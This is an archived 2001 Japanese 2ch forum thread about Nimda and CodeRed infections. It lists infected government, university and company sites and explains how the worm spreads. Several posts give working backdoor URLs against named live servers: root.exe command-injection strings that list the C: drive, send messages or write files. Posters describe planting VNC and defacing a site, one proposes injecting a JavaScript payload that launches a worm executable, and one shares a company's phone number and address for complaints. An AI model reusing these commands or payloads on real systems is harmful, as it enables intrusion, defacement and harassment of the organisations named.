1read 100read
2012年3月セキュリティ160: ニムダ被害報告スレ (269) TOP カテ一覧 スレ一覧 2ch元 削除依頼
【News】セキュリティ ニュース購読スレッド Vol.4 (393)
信者・自演・荒らしが酷いのでセキュ板にもIDが必要 (321)
スパイウェア削除ソフト Spybot Part59 (962)
【電磁波盗聴】TEMPEST【画面盗視】 (794)
ウィルスバスターアップデート前にあげるスレ 2 (843)
私はトレンドマイクロを信頼します (772)

ニムダ被害報告スレ


1 :01/09/21
どこがやられてる?
症状はどんな感じ?
挙げてこう。
(9/19)農水省にもウイルス侵入
(9/19)5国立大でウイルス感染
(9/19)三重県庁もウイルスに感染
(9/19)岐阜県でもウイルス感染
(9/19)宮城県庁もウイルス感染
(9/19)茨城県庁もウイルスに汚染

2 :01/09/21
http://it.nikkei.co.jp/it/sp9/sp9Ch.cfm?id=20010920eimi067020
韓国の情報通信省は20日、
米連邦捜査局(FBI)が米中枢同時テロとの関連を調べている
新種のコンピューターウイルス「W32/Nimda」について
約3700件の被害報告があったことを明らかにした。
同省は「コードレッドなどに比べて感染力が強く、急速に広がっている」
と注意を呼びかけている。
〔ソウル20日共同〕
韓国でも被害あり!!

3 :01/09/21
群馬県庁43台

4 :01/09/21
    ΛΛ    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 、_ ミ,,゚Д゚彡 < 正直、俺のPC。
  uuuu´     \ _____________________________________________

5 :01/09/21
内閣府によると、内閣官房と内閣府のLAN(構内情報通信網)の
一部サーバーと端末が19日午後、コンピューターウイルス「W32/Nimda(ニムダ)」に感染した。
この影響で汚染されたコンピューター端末が使えなくなったほか、
感染防止のため、内閣官房、内閣府から他のホームページを開かないよう指示した。

6 :01/09/21
某県庁確か24台。
漏れ、会社PC無傷。
漏れ、淋しいから感染サイトでニムダ落す。色々眺めて遊ぶ。
そしたら、キャッシュした感染サイトのhtmlソース自体がウイルス反応。
苦笑い。

7 :01/09/21
うちの大学・・・・

8 :01/09/21
       ____
     ,: 三ニ三ミミ;、-、     \/   ̄   | --十 i   、.__/__ \  ,   ____|__l l ー十
     xX''     `YY"゙ミ、    ∠=ー  ̄ヽ |  __|.  |   | /  ヽ  /   __|   ,二i ̄
    彡"     ..______.  ミ.    (___   ノ. | (__i゙'' し      ノ /^ヽ_ノ (__ (__
    :::::             ::;
   ,=ミ______=三ミ ji,=三ミi
   i 、'ーーー|,-・ー |=|,ー・- |                ,-v-、
   i; '::  ::: ーー" ゙i ,ーー'j             / _ノ_ノ:^)
    ーi:: ::i:  /`^ー゙`、_ ..i           / _ノ_ノ_ノ /)
     |:::. ゙"i _,,.-==-、;゙゙i             / ノ ノノ//
     〉::.:..  丶 " ゙̄ .'.ノ       ____  /  ______ ノ
   / i, `ー-、.,____,___ノ\____("  `ー" 、    ノ
 ー'/  'i. ヽ、 ,二ニ/   \       ``ー-、   ゙   ノ
  /   'i、 /\ /      >       ( `ー''"ー'"
  \   'i," (__) /   /         \ /ノ

9 :01/09/21
どこのスレか忘れたけど
18日にリアルタイムでmsnが変だって言ってる時に
普通に見に行ったらられれたーよ。

10 :01/09/22
おそらく、F社第○システム事業部および関連部署
20日出荷予定のパッケージシステム差分が出荷されず。
担当者曰く「ウィルスのせい」だそうです。

11 :01/09/22
某大手家電メーカー全社的にやられちゃいました〜。

12 :01/09/23
Q電

13 :01/09/23
岡山県庁

14 :01/09/23
>>9
ウイルスに感染してもHPは正常に見れるよ。

15 :01/09/23
高松市保健所感染

16 :01/09/23
掲示板付き感染サイトハケーン 大物居なくなった・・・
http://www.rsk2000.co.jp

17 :01/09/23
東京トヨペット閉鎖中
http://www.tokyo-toyopet.co.jp/comtop/index.html

18 :01/09/23
症状は?

19 :01/09/23
Apache鯖なのに置いてあるってことは便乗犯?
http://www1.sphere.ne.jp/noone/

20 :01/09/23
ダウ平均で有名なここもウィルスばら撒き中。
http://www.djnews.co.jp/
どうでもいいけど早く閉鎖しろよな(藁

21 :01/09/23
この企業は社会的責任も大きいのでこのまま放置は日本の恥
よって晒し上げ
苦情はこちら↓
Sites with longest running systems at Dow Jones Japan K.K.
Dow Jones Japan K.K. Marunouchi Mitsui Bldg. 1F, 2-2-2 Marunouchi, Chiyoda-ku, Tokyo 100-0005, Japan
ダウ・ジョーンズ・ジャパン(株)
住所 東京都千代田区丸の内2−2−2
電話(代表)03-5220-2730

22 :01/09/23
>>19
感染するとローカルマシンのhtmlファイルも改竄される模様。
どっかのページで地雷踏んで、それに気づかないままの可能性
あり。

23 :01/09/23
>>22
ってことは改竄されたhtmlを転送したってこと?
にしても転送後に普通確認するよなぁ。
readme.exeも一緒に転送とか、故意以外に考え難いんだが
そんなことあるの?

24 :01/09/23
>>16 は間違い 訂正はこっち
BBS付き感染サイト
http://www.rsk2000.co.jp/ipg/

25 :01/09/23
>>23
すま、俺もよくわかってないです
好奇心からいろいろ調べてるけど、伝染させるのに
使ってる脆弱性だけでも2,3あるし。
でも、ローカルのhtml,aspなど改竄するのは確かかと。
このへんから。
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.nimda.a@mm.html

26 :01/09/23
>>23
(ワーム自身の)コピーを行うフォルダにHTML、ASPファイルがあった
場合、HTMLファイルにJavaScriptのコマンドを一行追加すると同時に
“README.EML”のファイル名でウイルスのメールファイルを作成する
場合があります。このJavaScriptを追加されたHTML、ASPファイルが
Web上で公開されていた場合、そのページをブラウズすると
“README.EML”がオープンされ、IEのセキュリティホールにより
ウイルスが活動を開始します。

27 :01/09/23
>>24
>nimudaウィルスは、サーバーが感染したものです。
>すでに駆除済みですが、コマンドが断片的に残されており
>ニムダを自動的にインストールしようとしてエラーが起こります。
>ウィルス自体は駆除済みなので感染することもございません。
>安心して閲覧して下さい。
だそうです。確かにhtmlには残骸が残っててダウンロードさせる
動作はするがreadme.exeが無いため404になってるようだが。

28 :01/09/24
おいらのPC、190も".eml"があったよ〜。 (T_T)
でも、起動ドライブには1つも無かった。
感染してるのか?

29 :01/09/24
「ノートン入れてるからぁ」なんて余裕だったんだけど、甘かった。
セキュリティのログ見て、ここんとこずっと一分おきくらいに一日中
アタックされてるからなんかむかついて1個アドレスコピーしてIPサーチ
のHPでそのアドレスに繋いだとたん、画面にでっかく「FUCK’IN USA GAMEMT」
とか出てアンチウィルスの警告・・・処理画面の「次へ」のボタン押しつづけても新たな
警告のダイアログが・・・結局除去不可でウィルス隔離された後、手動でウィルス定義
更新して、完全スキャンして(ウィルスは発見されませんでした)その後メニュー画面で検疫
ログ見たら3つファイルがあったので削除。やっぱemlとかreadmeとなってた。
 これでOKですよね?

30 :01/09/24
キャッシュで止まってたの?
つうか感染サイト行く時にはJavaのアクティブスクリプト
切りましょう。

31 :01/09/24
SOYOで食らった。Nimda感染が判明したからか、今は一部ページが削除されてるようだが。
http://www.soyo.co.jp/

32 :01/09/24
>>30
>Javaのアクティブスクリプト
って何?

33 :01/09/24
>>30
そういうボケ、おれ好きよ☆

34 :01/09/24
ttp://www.advaoptical.co.jp
アドバ・オプティカル・ネットワーキング株式会社
  CodeRedにもやられたままだし。。。
  注意しようにもDNSでMXが設定されてないし。。。。
社名にネットワーキングとはいってるが、何の会社だ。。。

35 :01/09/24
マクで感染サイト開くと、 タイトルバーに
http://www.xxx.xx.xx/readme.eml
って書いてあるでかいウィンドゥが開くんだよ。

36 :01/09/24
拙者の自宅PCたちは無事だったが、会社のネットワーク全滅。
1度駆除したが、再度罹患して全滅。
おととい駆除を終えたばかり。
今後2度と罹患しないでくれ〜。
なぜか拙者が容疑者だ。

37 :01/09/24
>>34
光通信デバイスの商社です。

38 :01/09/24
>>37
ネットワーキングといっても
コンピュータネットワークとはあまり関係ないんだね。
(関係あったらちょっとヤだったけど)
連休中だから会社に人がいなくて気づいてないのかな。。

39 :01/09/24
しかし、このアドバ DNSからMXがひろえないというのは
何だろう。
メールはやらないということか。

40 :01/09/24
nullって窓が開いたぞ〜
なんだこりゃぁぁぁあぁぁああああああああああああああああああああああああ

41 :01/09/24
>>40
ご愁傷様です(藁

42 :01/09/24
感染するとどうなるわけ?

43 :01/09/24
>>42
バックドアの作成、admin.dll/riched20.dllの上書き、htmlファイルの改竄、
すべてのドライブのネットワーク共有の作成、開いているネットワーク共有フォルダへ
自分自身をコピー、ゲストアカウントの管理者権限への昇格、自前のSMTPエンジンを
使って自分自身を大量送信、実行形式ファイルの改竄
などなど。

44 :01/09/25
連休で放置されたままのサイト多いと思われ。
その上CodeRedのroot.exe残ったままって結構あるな。

45 :01/09/25
どこの国立大学が感染したの?

46 :01/09/25
あどば、月曜になってもそのまま
http://www.advaoptical.co.jp/scripts/root.exe?/c%20dir%20c:\
社名からネットワーキングはずした方がよくないか?

47 :01/09/25
二重に引っかかってます
ttp://www.bee.woodland.co.jp/test/kb-index.htm

48 :01/09/25
ウッドランドさんまで。。。

49 :01/09/26
気を取り直して。
ここ↓は、やられてるのでしょうか?
ttp://www5.yodobashi.co.jp/jsp/dc.jsp?sst_id=0000000002

50 :01/09/26
これだけ感染被害が出やすくて、次のXPでも問題点が解消されてなければ集団もんじゃない?
絶対、PL法違反だよ。分かってるバグを残して出荷してるんだから。
みんなで声を高らかに上げよう!
マイクロソフトはXPを無償で配ばれ!!

51 :01/09/26

>マイクロソフトはXPを無償で配ばれ!!
穴だらけのものがこれ以上広がったらよけいマズイぞ!!

52 :01/09/26
XPって穴あるの? もうわかってるの?

53 :01/09/26
NTや200の穴具合からみて
あると憶測してもいいと思われ。

54 :01/09/26
>53
というか、たとえ無くても、以後1年間は穴空けられまくると推測する方が
前向きで宜しいと思われ。
先ずは、リモートデスクトップ。
外からアクセスに強くても内側から起動させられて利用されればどうしよう
もないと思われ。

55 :01/09/26
XP対応の新種ワーム誕生
 ↓
トラフィクが急激に増大
 ↓
各プロバイダのバックボーン増強
 ↓
(゚д゚)ウマー
 ↓
     ,一-、
    / ̄ l |   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   ■■-っ < んなーこたーない
   ´∀`/    \________
  __/|Y/\.
Ё|__ | /  |
   | У..  |

56 :01/09/28
もういっぺんニムダ捕獲しようとしてうろうろ
してるけど、なかなか捕まらないYO!
しかし、感染したことを隠す組織のなんと多いことか....
readme.emlへのアクセスだけを取り払っているので
バレバレだってばよ。
<language=JavaScript></JavaScript>
みたいな感じでばっちり残ってるんだけど....

57 :01/09/28
>>56
port80のログをチェックして、nimdaからのアクセスがあれば
そこのroot.exeを覗きに行く、というのではどうかな。
数日前だけど、それでいくつか入手したよ。

58 :01/09/28
>>56
いくらでもどうぞ。
ttp://www.sano-mfg.co.jp/tokucyo/tokuchou.htm
ttp://www.bee.woodland.co.jp
ttp://www.clubtgp.com/freehosting/teeny/kat/index.htm

59 :01/09/28
>>56
redme.eml拾ってどうするの?
base64エンコードの部分だけxxxしてxxxxとxxxてxxxxなよ(w

60 :01/09/28
>>57
そういえば、その方法使えたな....
どもです
>>58
ありがと、後で見に行ってみるよ。
>>59> redme.eml拾ってどうするの?
いや、ただ単に漏れが興味あるから見たくなっただけ。
ほら、それにこれだけ大騒ぎになってるのにほったらかしに
してある鯖ってちょっと見てみたくない?(w

61 :01/09/28
>>60
>ほら、それにこれだけ大騒ぎになってるのにほったらかしに
>してある鯖ってちょっと見てみたくない?(w
つーか、ほったらかしのサイトってまえにあった
ttp://IP/script/root.exe?/c%20net%20send%20localhost%20%22ほげほげ%22
でメッセージ送ろうがお構いなしだよ。
そいやたまたまログに残ってたのを見にいったら、CodeRed.txtって
いうファイルを作ってる先客がいた。それでも気が付かないみたい。
ttp://IP/scripts/root.exe?/c%20echo%20Your Machine is infected by CodeRed.>c:\>CodeRed.txt
モニタ切ってるのかな?いいかげん飽きてきた。

62 :01/09/28
>>61
ムダムダ。シャットダウンに成功したって翌日そのまま再起動してた例があるくらいだから。

63 :01/09/28
だから「2無駄」って言うのかぁ

64 :01/09/28
>>61
そういえば、
あるサイトで見たんだが、
2001-09-20 04:03p 667,648 V3nimda.exe
このV3てなんだ?

65 :01/09/28
だいたい、
http://IP/
で閉店してるのに
root.exe
が通るようなサイトは永久にこのままだな(w

66 :01/09/28
>>64
実行したら http://IP/
ページを表示できません
だったのが、
ページが見つかりません
になっちゃったよ(w

67 :01/09/29
>>64
V3はCodeRedIIのことかな?
ま、一応は対策しようとしてる姿勢はあるようだな。
バックドアには無頓着のようだが(w
>>61
再起動されたらしつこくシャットダウン(w
つか、2000でコマンドからシャットダウンってのは難しそう。
http://homepage2.nifty.com/winfaq/w2k/boot.html#1001
それもコマンドでファイル作って実行したのかな?

68 :01/09/29
>>67
おらいま、VNCサーバー送り込もうとしてるだ(w

69 :01/09/29
>>68
もう、何でもやってちょぷだい。
でもイターイのイヤーン。

70 :01/09/29
>>67
つーか、こういうのがあるなら、感染マシンに取りこまさせたのでしょう。
漏れはやったわけじゃないけど。

71 :01/09/29
某会社、1週間も泊まりつづけてニムダ駆除してるんだけど
それってどう?

72 :01/09/29
>>70
んー、どこぞのftpでアップしろというのもanonymousじゃ
だめなわけだから結構難しいと思う。
感染鯖からftpでgetまでもできなさそう。
ftpまでハックしないと無理でない?

73 :01/09/29
>>71
個人ユーザーが1台のマシンにつきっきりでもしんどいし、アタマ使うのに、会社で五月雨式にやっても永久に・・・。
某社ではIE禁止令(来年3月までの時限)が出たらしいよ。

74 :01/09/29
ただ閉じてるだけのところ、日本には山ほどあるよね。
http://www.takara-univ.ac.jp/
http://www.unionsys.co.jp/
http://nac-ltd.co.jp/
http://www.htsc.ap.titech.ac.jp
http://www.sg-jc.ac.jp/
http://www.advaoptical.co.jp/
http://www.computools.co.jp/
http://www.sano-mfg.co.jp
http://www1.fl.kansai-u.ac.jp/
http://www.inet-service.co.jp/
このへんが復活したらどうなるんだろう。 嵐が収まったから玄関あけよう、みたいなところも多いような・・。
こんなとこもあるし。
http://pc2.autechs-unet.ocn.ne.jp
10月再開って、なんか目途があるんだろうか。
http://www.with9.com/

75 :01/09/29
>>72
EXPLOITツール使う。若し対象鯖未だパッチ当ててないなら使える。
外出配布済み。

76 :01/09/30
>>74
取りあえず×
http://www.inet-service.co.jp/scripts/root.exe?/c%20dir%20c:\

77 :01/09/30
人間の脳にも感染するようです。
http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs

78 :01/09/30
>>76
>これからの企業成長の原動力はダイナミックな情報システム。
>そのキーとなるのがイントラネットシステムです。
>国境や時差の壁を越え、世界中のあらゆる分野に浸透しつつあるインターネットを
>企業内のクライアント・サーバーシステムと融合させることにより
バックドアにより見事にイントラネットとインターネットが融合
しました(w

79 :01/10/01
報告!
http://www.zumensoft.co.jp/menu.html

80 :01/10/01
>>77
>>79
同じやん( ̄△ ̄;

81 :01/10/01
>私たちは、企業の社内外に存在する「情報」を、戦略的な資源として活用するするための「仕組み作り」を、お客様と共に「リアライズ」(実現)
>していくことを基本理念としています
バックドアによって社外から有用な情報が勝手にはいってくるわけですな。

82 :01/10/01
http://www.bee.woodland.co.jp/readme.eml
だめぢゃん( ̄△ ̄;

83 :01/10/01
http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs
>ウィルス駆除ソフトはシマンテックNorton Antivirus2000を使っていましたが効き目がありません
ノートンだめだとよ(w

84 :01/10/02
>>83
匿名で投稿した2CHねら居たみたいだけど、IP晒されてる・・・。

85 :01/10/02
>>84
晒されるのは最初から分かっているのだから承知の上だろう。

86 :01/10/03
ニムダ感染のため、行方不明になりました。
http://www.miruku.co.jp/usr/find/higa.htm
探してあげてください。

87 :01/10/03
>>86
こ…このサイト、ひどすぎない?

88 :01/10/03
>>86
ニムダのソース弄って、尋ね人のデータと連絡先本文にしてばら撒けば
良いよ。

89 :01/10/03
http://www.miruku.co.jp/
index.htmlのソースに烈しくワラタ

90 :01/10/03
>>89
<!-- sorosoro naosouyo... meiwakudayo... -->

91 :01/10/03
90は誰が書いたのかな。。。。

92 :01/10/03
>>91
89と思われ(w

93 :01/10/03
90書いて人に
”改竄できるなら、無害化しておいてやれ”
ってのはマズイんだよな。やっぱ

94 :01/10/03
90書いてる人に
”改竄できるなら、index.htmlにも
<html><script language="JavaScript">window.open("V3nimda.exe",null, "resizable=no,top=6000,left=6000")</script></html>
を挿入しておいてやれ”
ってのもマズイんだよな。やっぱ

95 :01/10/03
>>89
もっとひどいことになってるぞおい

96 :01/10/03
>>95=89
だからやめなはれって(w

97 :01/10/03
遊んだら戻して置いてね。
---
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META name="GENERATOR" content="IBM WebSphere Homepage Builder V6.0.2 for Windows">
<META http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
<META http-equiv="Content-Style-Type" content="text/css">
<TITLE>沖縄情報</TITLE>
</HEAD>
<FRAMESET rows="143,*" frameborder="NO">
<FRAME src="index_u.html" scrolling="AUTO">
<FRAMESET cols="125,*" frameborder="NO">
<FRAME src="index_l.html" scrolling="AUTO">
<FRAME src="index_d.html" scrolling="AUTO">
</FRAMESET>
<NOFRAMES>
<BODY>
<P>このページをご覧いただくにはフレーム対応のブラウザが必要です。</P>
</BODY>
</NOFRAMES>
</FRAMESET>
</HTML>
<!-- sorosoro naosouyo... meiwakudayo... -->

98 :01/10/03
>>95
そこまでできるなら、NapかMXの鯖置いてくれ(w

99 :01/10/03
>>89
<html><meta http-equiv="refresh" content="0.1;URL=http://www.-jp.net/dh/02/"></html>
あ〜あ・・・こんなもんかね。ページクラクって(w
串さして遣ってないと不味い事にならんかね。。(w

100read 1read
1read 100read
TOP カテ一覧 スレ一覧 2ch元 削除依頼
トレンドマイクロ「医者の不養生」 社員PCが感染 (920)
トレンドマイクロ社製品不買運動しないか? (578)
ウィルスバスターアップデート前にあげるスレ 2 (843)
ウイルスチェイサーPart8 (322)
☆彡Kerio Personal Firewall 2.1.5 Rule 20☆彡 (922)
あやしいファイルを実行するスレ 2層目 (658)
--log9.info------------------
【在日】朴一(パク・イル)【教授・コメンテーター】 (144)
【たけし】 所ジョージは自しろや 【さんま】 (218)
板野友美たん最強伝説 (257)
震災報道中に見たくない有名人は? (685)
アンチ藤森慎吾その3 (204)
オカンがガクトという奴を様付けしている件について (104)
顔が男みたいな女性芸能人 (492)
貧の女性タレントといえば? (580)
好きなキャラやアイテムで嫌いな芸能人を倒す (452)
ダウンタウンファンの有名人がとにかく多い件78 (540)
豊原功補(1) (186)
【祝10周年】マーベルエール Part19【もふ社長】 (332)
上戸彩とできるならいくら払う? (644)
ブサカワな女性芸能人といえば誰? (443)
【真鍋かをり】脱税疑惑 (459)
サセコ栽培86 (322)
--log55.com------------------
【最弱】何故青森はいつまでも最弱県扱いなのか? Part10
☆ 新・九州・沖縄の高校野球 part2
なぜ第101回高校野球選手権記念大会は前代未聞の糞大会になったのか
PL学園とはなんだったのか part2
【札幌在住】北海道スレを荒らしまくる駒苫ヲタ 第5病棟【無職】
【札幌在住】北海道スレを荒らしまくる駒大苫小牧ヲタの自演をコピペするスレッド【無職】 Part.5
大正昭和平成令和と4つの時代で甲子園出場を目指す高校スレ
俺だけでも佐賀の高校野球を語るスレ Part51